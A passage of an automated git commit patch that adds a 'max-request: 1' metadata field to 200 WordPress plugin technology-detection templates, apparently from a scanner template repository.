+templates-checksum.txt:f22f12b1a904c5158e762c6a53b819d9dcdfe19c wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 55ba91f8edafcd5c370b4be115863b689e9f43e9 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 3 Jul 2023 05:29:13 +0000 Subject: [PATCH 290/609] TemplateMan Update [Mon Jul 3 05:29:13 UTC 2023] :robot: --- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 + http/technologies/wordpress/plugins/add-to-any.yaml | 1 + http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 + http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 + http/technologies/wordpress/plugins/akismet.yaml | 1 + .../wordpress/plugins/all-404-redirect-to-homepage.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 + .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 + http/technologies/wordpress/plugins/amp.yaml | 1 + http/technologies/wordpress/plugins/antispam-bee.yaml | 1 + http/technologies/wordpress/plugins/astra-sites.yaml | 1 + http/technologies/wordpress/plugins/astra-widgets.yaml | 1 + http/technologies/wordpress/plugins/autoptimize.yaml | 1 + http/technologies/wordpress/plugins/backwpup.yaml | 1 + http/technologies/wordpress/plugins/better-search-replace.yaml | 1 + http/technologies/wordpress/plugins/better-wp-security.yaml | 1 + .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 + http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 + http/technologies/wordpress/plugins/breeze.yaml | 1 + http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 + .../technologies/wordpress/plugins/child-theme-configurator.yaml | 1 + http/technologies/wordpress/plugins/classic-editor.yaml | 1 + http/technologies/wordpress/plugins/classic-widgets.yaml | 1 + .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 + http/technologies/wordpress/plugins/cloudflare.yaml | 1 + http/technologies/wordpress/plugins/cmb2.yaml | 1 + http/technologies/wordpress/plugins/coblocks.yaml | 1 + http/technologies/wordpress/plugins/code-snippets.yaml | 1 + http/technologies/wordpress/plugins/coming-soon.yaml | 1 + http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7.yaml | 1 + http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 + http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 + http/technologies/wordpress/plugins/cookie-notice.yaml | 1 + http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 + .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 + http/technologies/wordpress/plugins/custom-css-js.yaml | 1 + http/technologies/wordpress/plugins/custom-fonts.yaml | 1 + http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 + http/technologies/wordpress/plugins/disable-comments.yaml | 1 + http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/duplicate-page.yaml | 1 + http/technologies/wordpress/plugins/duplicate-post.yaml | 1 + http/technologies/wordpress/plugins/duplicator.yaml | 1 + .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 + http/technologies/wordpress/plugins/easy-fancybox.yaml | 1 + http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 + http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 + http/technologies/wordpress/plugins/elementor.yaml | 1 + http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 + http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 + http/technologies/wordpress/plugins/envato-elements.yaml | 1 + .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 + http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 + .../technologies/wordpress/plugins/facebook-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 + .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 + http/technologies/wordpress/plugins/flamingo.yaml | 1 + http/technologies/wordpress/plugins/fluentform.yaml | 1 + http/technologies/wordpress/plugins/font-awesome.yaml | 1 + .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/formidable.yaml | 1 + http/technologies/wordpress/plugins/forminator.yaml | 1 + http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 + http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 + .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 + .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 + http/technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 + http/technologies/wordpress/plugins/google-site-kit.yaml | 1 + .../technologies/wordpress/plugins/google-sitemap-generator.yaml | 1 + http/technologies/wordpress/plugins/gtranslate.yaml | 1 + http/technologies/wordpress/plugins/gutenberg.yaml | 1 + http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 + .../wordpress/plugins/header-and-footer-scripts.yaml | 1 + .../wordpress/plugins/header-footer-code-manager.yaml | 1 + http/technologies/wordpress/plugins/header-footer-elementor.yaml | 1 + http/technologies/wordpress/plugins/header-footer.yaml | 1 + http/technologies/wordpress/plugins/health-check.yaml | 1 + http/technologies/wordpress/plugins/hello-dolly.yaml | 1 + http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 + http/technologies/wordpress/plugins/imagify.yaml | 1 + http/technologies/wordpress/plugins/imsanity.yaml | 1 + .../wordpress/plugins/insert-headers-and-footers.yaml | 1 + http/technologies/wordpress/plugins/instagram-feed.yaml | 1 + .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/iwp-client.yaml | 1 + http/technologies/wordpress/plugins/jetpack.yaml | 1 + http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 + http/technologies/wordpress/plugins/kirki.yaml | 1 + http/technologies/wordpress/plugins/leadin.yaml | 1 + .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 + http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 + http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 + http/technologies/wordpress/plugins/loco-translate.yaml | 1 + http/technologies/wordpress/plugins/loginizer.yaml | 1 + http/technologies/wordpress/plugins/loginpress.yaml | 1 + .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 + http/technologies/wordpress/plugins/mailpoet.yaml | 1 + http/technologies/wordpress/plugins/maintenance.yaml | 1 + http/technologies/wordpress/plugins/mainwp-child.yaml | 1 + http/technologies/wordpress/plugins/malcare-security.yaml | 1 + http/technologies/wordpress/plugins/megamenu.yaml | 1 + http/technologies/wordpress/plugins/members.yaml | 1 + http/technologies/wordpress/plugins/meta-box.yaml | 1 + http/technologies/wordpress/plugins/ml-slider.yaml | 1 + http/technologies/wordpress/plugins/newsletter.yaml | 1 + .../technologies/wordpress/plugins/nextend-facebook-connect.yaml | 1 + http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 + http/technologies/wordpress/plugins/ninja-forms.yaml | 1 + http/technologies/wordpress/plugins/ocean-extra.yaml | 1 + http/technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 + http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 + http/technologies/wordpress/plugins/optinmonster.yaml | 1 + http/technologies/wordpress/plugins/otter-blocks.yaml | 1 + http/technologies/wordpress/plugins/password-protected.yaml | 1 + http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 + http/technologies/wordpress/plugins/photo-gallery.yaml | 1 + http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 + http/technologies/wordpress/plugins/polylang.yaml | 1 + http/technologies/wordpress/plugins/popup-builder.yaml | 1 + http/technologies/wordpress/plugins/popup-maker.yaml | 1 + http/technologies/wordpress/plugins/post-smtp.yaml | 1 + http/technologies/wordpress/plugins/post-types-order.yaml | 1 + .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 + http/technologies/wordpress/plugins/pretty-link.yaml | 1 + http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 + http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 + http/technologies/wordpress/plugins/redirection.yaml | 1 + http/technologies/wordpress/plugins/redux-framework.yaml | 1 + http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/safe-svg.yaml | 1 + http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 + http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 + http/technologies/wordpress/plugins/sg-security.yaml | 1 + http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 + .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 + .../technologies/wordpress/plugins/simple-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/siteguard.yaml | 1 + http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 + http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 + http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 + .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 + http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 + http/technologies/wordpress/plugins/svg-support.yaml | 1 + http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 + http/technologies/wordpress/plugins/tablepress.yaml | 1 + http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 + http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 + http/technologies/wordpress/plugins/themeisle-companion.yaml | 1 + http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 + .../wordpress/plugins/translatepress-multilingual.yaml | 1 + .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/under-construction-page.yaml | 1 + http/technologies/wordpress/plugins/updraftplus.yaml | 1 + http/technologies/wordpress/plugins/use-any-font.yaml | 1 + http/technologies/wordpress/plugins/user-role-editor.yaml | 1 + .../technologies/wordpress/plugins/velvet-blues-update-urls.yaml | 1 + http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 + .../technologies/wordpress/plugins/webp-converter-for-media.yaml | 1 + http/technologies/wordpress/plugins/webp-express.yaml | 1 + .../technologies/wordpress/plugins/widget-importer-exporter.yaml | 1 + .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 + .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 + http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 + .../plugins/woocommerce-gateway-paypal-express-checkout.yaml | 1 + .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 + .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 + .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 + http/technologies/wordpress/plugins/woocommerce.yaml | 1 + http/technologies/wordpress/plugins/wordfence.yaml | 1 + http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 + http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 + http/technologies/wordpress/plugins/worker.yaml | 1 + http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 + http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 + http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 + http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 + http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 + http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 + http/technologies/wordpress/plugins/wp-optimize.yaml | 1 + http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 + http/technologies/wordpress/plugins/wp-reset.yaml | 1 + http/technologies/wordpress/plugins/wp-rollback.yaml | 1 + http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 + http/technologies/wordpress/plugins/wp-smushit.yaml | 1 + http/technologies/wordpress/plugins/wp-statistics.yaml | 1 + http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-user-avatar.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 + http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 + http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 + http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 + .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 + 200 files changed, 200 insertions(+) diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 7cbd1855ae..ebb5ba1042 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ad-inserter/ metadata: + max-request: 1 plugin_namespace: ad-inserter wpscan: https://wpscan.com/plugin/ad-inserter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 8d579ff23d..fddfbf3118 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/add-to-any/ metadata: + max-request: 1 plugin_namespace: add-to-any wpscan: https://wpscan.com/plugin/add-to-any tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 4a6d8b7bbe..7a6e8a76ec 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/admin-menu-editor/ metadata: + max-request: 1 plugin_namespace: admin-menu-editor wpscan: https://wpscan.com/plugin/admin-menu-editor tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index e4eb308d39..940c0e614c 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/advanced-custom-fields/ metadata: + max-request: 1 plugin_namespace: advanced-custom-fields wpscan: https://wpscan.com/plugin/advanced-custom-fields tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 97f1d8c18f..06cfd4950b 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/akismet/ metadata: + max-request: 1 plugin_namespace: akismet wpscan: https://wpscan.com/plugin/akismet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml index 10f104f2c7..90aa5881fd 100644 --- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml +++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-404-redirect-to-homepage/ metadata: + max-request: 1 plugin_namespace: all-404-redirect-to-homepage wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 8addc28ded..1bf337da6c 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-in-one-seo-pack/ metadata: + max-request: 1 plugin_namespace: all-in-one-seo-pack wpscan: https://wpscan.com/plugin/all-in-one-seo-pack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 2e579621ac..7cec152555 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-migration/ metadata: + max-request: 1 plugin_namespace: all-in-one-wp-migration wpscan: https://wpscan.com/plugin/all-in-one-wp-migration tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 41e297ffeb..8a4b6133cd 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/ metadata: + max-request: 1 plugin_namespace: all-in-one-wp-security-and-firewall wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 0dd8686ec3..cfa2e3d080 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/amp/ metadata: + max-request: 1 plugin_namespace: amp wpscan: https://wpscan.com/plugin/amp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 359671f3bd..a92d9bde4e 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/antispam-bee/ metadata: + max-request: 1 plugin_namespace: antispam-bee wpscan: https://wpscan.com/plugin/antispam-bee tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 116e0c420a..59144c7dd5 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/astra-sites/ metadata: + max-request: 1 plugin_namespace: astra-sites wpscan: https://wpscan.com/plugin/astra-sites tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml index dc4703ef8d..df06ba2f35 100644 --- a/http/technologies/wordpress/plugins/astra-widgets.yaml +++ b/http/technologies/wordpress/plugins/astra-widgets.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/astra-widgets/ metadata: + max-request: 1 plugin_namespace: astra-widgets wpscan: https://wpscan.com/plugin/astra-widgets tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 1426ac3ef2..2a79d529cc 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/autoptimize/ metadata: + max-request: 1 plugin_namespace: autoptimize wpscan: https://wpscan.com/plugin/autoptimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 78d1651ff4..556a113acc 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/backwpup/ metadata: + max-request: 1 plugin_namespace: backwpup wpscan: https://wpscan.com/plugin/backwpup tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index f7219b373d..58d9a9d738 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/better-search-replace/ metadata: + max-request: 1 plugin_namespace: better-search-replace wpscan: https://wpscan.com/plugin/better-search-replace tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index f688a68f72..6c9c485079 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/better-wp-security/ metadata: + max-request: 1 plugin_namespace: better-wp-security wpscan: https://wpscan.com/plugin/better-wp-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 00e95c4263..7631e87d78 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/black-studio-tinymce-widget/ metadata: + max-request: 1 plugin_namespace: black-studio-tinymce-widget wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 212b2b13c4..c7daa26ac6 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/breadcrumb-navxt/ metadata: + max-request: 1 plugin_namespace: breadcrumb-navxt wpscan: https://wpscan.com/plugin/breadcrumb-navxt tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 6318392c5c..68767e4dce 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/breeze/ metadata: + max-request: 1 plugin_namespace: breeze wpscan: https://wpscan.com/plugin/breeze tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index e1a2a186e0..073618936d 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/broken-link-checker/ metadata: + max-request: 1 plugin_namespace: broken-link-checker wpscan: https://wpscan.com/plugin/broken-link-checker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 23614882a7..6aabc19e9f 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/child-theme-configurator/ metadata: + max-request: 1 plugin_namespace: child-theme-configurator wpscan: https://wpscan.com/plugin/child-theme-configurator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 85965337cb..ac80e4f31b 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/classic-editor/ metadata: + max-request: 1 plugin_namespace: classic-editor wpscan: https://wpscan.com/plugin/classic-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 33d903a1b4..15d7a24755 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/classic-widgets/ metadata: + max-request: 1 plugin_namespace: classic-widgets wpscan: https://wpscan.com/plugin/classic-widgets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 3c6f8f287b..40ccc15b27 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/click-to-chat-for-whatsapp/ metadata: + max-request: 1 plugin_namespace: click-to-chat-for-whatsapp wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cloudflare.yaml b/http/technologies/wordpress/plugins/cloudflare.yaml index e555bf93d3..425adf0bfe 100644 --- a/http/technologies/wordpress/plugins/cloudflare.yaml +++ b/http/technologies/wordpress/plugins/cloudflare.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cloudflare/ metadata: + max-request: 1 plugin_namespace: cloudflare wpscan: https://wpscan.com/plugin/cloudflare tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index c3b630cde2..1fad3cee08 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cmb2/ metadata: + max-request: 1 plugin_namespace: cmb2 wpscan: https://wpscan.com/plugin/cmb2 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index 5c8ce709b6..ebe4ee41a7 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/coblocks/ metadata: + max-request: 1 plugin_namespace: coblocks wpscan: https://wpscan.com/plugin/coblocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index aea47b9e84..5c32110e0e 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/code-snippets/ metadata: + max-request: 1 plugin_namespace: code-snippets wpscan: https://wpscan.com/plugin/code-snippets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 78c584c388..09c2e2f360 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/coming-soon/ metadata: + max-request: 1 plugin_namespace: coming-soon wpscan: https://wpscan.com/plugin/coming-soon tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 2c80d09c27..1a2e8beb3e 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/complianz-gdpr/ metadata: + max-request: 1 plugin_namespace: complianz-gdpr wpscan: https://wpscan.com/plugin/complianz-gdpr tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 4b1b3a8754..706145493c 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/contact-form-7-honeypot/ metadata: + max-request: 1 plugin_namespace: contact-form-7-honeypot wpscan: https://wpscan.com/plugin/contact-form-7-honeypot tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 06ad83bdf7..cf6a6ee635 100644 --- 